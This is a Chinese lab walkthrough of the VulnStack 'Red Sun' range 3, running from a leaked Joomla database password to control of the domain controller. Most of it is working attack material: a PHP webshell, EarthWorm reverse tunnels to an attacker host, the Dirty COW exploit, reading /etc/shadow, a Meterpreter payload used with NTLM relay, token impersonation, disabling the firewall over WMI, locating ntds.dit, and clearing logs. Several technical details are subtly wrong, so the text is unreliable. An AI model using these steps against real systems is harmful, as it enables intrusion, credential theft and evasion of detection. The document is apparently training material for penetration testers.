红日靶场三实战:从MySQL泄露到域控提权的完整ATTCK链路解析
红日靶场三深度实战:从Web渗透到域控提权的ATT&CK战术拆解
1. 靶场环境与攻击路径全景
红日安全团队设计的VulnStack靶场系列已成为渗透测试人员进阶训练的黄金标准。第三套靶场环境模拟了典型企业混合架构——外网Web服务器(CentOS+Ubuntu双机负载)、内网域环境(Windows Server 2012域控+Windows 7工作站+Windows Server 2008应用服务器)组成的攻防演练场景。
核心攻击链路由五个关键阶段构成:
- 外网Web应用突破(MySQL凭据泄露→后台getshell)
- 内网代理搭建(EarthWorm反向隧道)
- Linux提权作战(脏牛漏洞利用)
- 横向移动渗透(NTLM Relay攻击链)
- 域控终极控制(Token窃取+防火墙绕过)
攻击者需要依次突破三层防御圈:
- 外网Web应用层(80/3306端口)
- 内网Linux服务器(Ubuntu+CentOS)
- Windows域环境(2008→2012渗透路径)
实验环境配置要点:所有内网主机采用Host-Only模式(192.168.93.0/24),Kali攻击机通过双网卡桥接实现内外网访问。
2. Web突破:从MySQL泄露到Webshell获取
2.1 信息收集与漏洞定位
端口扫描显示目标开放关键服务:
nmap -sV 192.168.119.118PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS)) 3306/tcp open mysql MySQL 5.6.51目录扫描发现Joomla后台路径:
http://192.168.119.118/administrator/index.php突破关键:通过配置文件泄露获取数据库凭据
http://192.168.119.118/configuration.phppublic $user = 'testuser'; public $password = 'cvcvgjASD!@'; public $db = 'joomla_db';2.2 MySQL注入攻击实战
使用泄露凭据远程登录数据库:
mysql -h 192.168.119.118 -u testuser -p'cvcvgjASD!@'执行权限提升操作:
-- 修改管理员密码(需MD5加密) UPDATE joomla_users SET password = MD5('Admin@123') WHERE username = 'admin'; -- 添加新管理员账户 INSERT INTO joomla_users (username, password, name, email) VALUES ('hacker', MD5('P@ssw0rd'), 'Pentester', 'test@example.com'); -- 分配超级用户权限 INSERT INTO joomla_user_usergroup_map (user_id, group_id) VALUES ((SELECT id FROM joomla_users WHERE username='hacker'), 8);2.3 Webshell部署与绕过技巧
通过Joomla模板编辑器植入PHP后门:
<?php // 混淆型一句话木马 $c = $_REQUEST['x']; if(isset($c)){ system(base64_decode($c)); } ?>disable_functions绕过方案:
- 上传LD_PRELOAD劫持so文件
- 使用蚁剑插件"绕过disable_functions"
- 通过PHP-FPM未授权访问漏洞
最终获取的Webshell权限信息:
whoami # www-data id # uid=33(www-data) gid=33(www-data) groups=33(www-data)3. 内网渗透:代理搭建与提权作战
3.1 网络拓扑探测
通过Webshell执行内网扫描:
ifconfig # eth0: 192.168.119.118 # eth1: 192.168.93.100 arp -a # 192.168.93.20 (Win2008) # 192.168.93.30 (Win7) # 192.168.93.10 (Win2012)3.2 隧道搭建实战
使用EarthWorm建立三级级联代理:
# 攻击机执行 ./ew -s lcx_listen -l 1080 -e 8888 # 跳板机执行 ./ew -s lcx_slave -d 攻击机IP -e 8888 -f 内网IP -g 9999 # 目标内网执行 ./ew -s rssocks -d 跳板机IP -e 9999代理配置验证:
proxychains nmap -sT -Pn 192.168.93.103.3 脏牛提权全流程
漏洞验证:
uname -a # Linux web-centos 3.10.0-1127.el7.x86_64 grep -i dirty /proc/version提权操作:
gcc -pthread dirty.c -o dirty -lcrypt ./dirty myNewPassword提权后关键操作:
cat /etc/shadow ssh-keygen -t rsa -f /root/.ssh/id_rsa4. 横向移动:NTLM Relay攻击链详解
4.1 攻击原理与环境准备
NTLM Relay三要素:
- SMB签名未强制启用
- 内网存在特权账户
- 可诱导用户访问恶意服务器
工具准备:
git clone https://github.com/SecureAuthCorp/impacket cd impacket/examples生成恶意payload:
msfvenom -p windows/x64/meterpreter/bind_tcp \ LHOST=192.168.93.100 LPORT=4444 -f exe > shell.exe4.2 攻击实施步骤
启动SMB中继服务:
python3 smbrelayx.py -h 192.168.93.20 -e ./shell.exeMSF配置监听:
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 192.168.93.20 set LPORT 4444 run触发条件:当域用户访问\192.168.93.100时,自动完成:
- 凭证窃取
- 哈希中继
- payload投递
4.3 后渗透关键操作
获取域管理员Token:
load incognito list_tokens -u impersonate_token "TEST\\Administrator"定位域控制器:
net group "Domain Controllers" /domain5. 域控突破:从权限提升到数据窃取
5.1 防火墙绕过技术
通过WMI远程关闭防护:
Invoke-WmiMethod -ComputerName DC01 -Class Win32_Process -Name Create -ArgumentList "netsh advfirewall set allprofiles state off"5.2 敏感数据定位技巧
域控常见数据存储位置:
\\DC01\C$\Users\Administrator\Documents \\DC01\C$\Windows\NTDS\ntds.dit \\DC01\C$\Windows\System32\config\SAM使用PowerShell搜索机密文件:
Get-ChildItem -Path C:\ -Recurse -Include *.doc,*.xls,*.pdf -Force -ErrorAction SilentlyContinue | Select-Object FullName5.3 痕迹清理方案
Linux系统:
history -c rm -rf /var/log/auth.logWindows系统:
wevtutil cl Security wevtutil cl System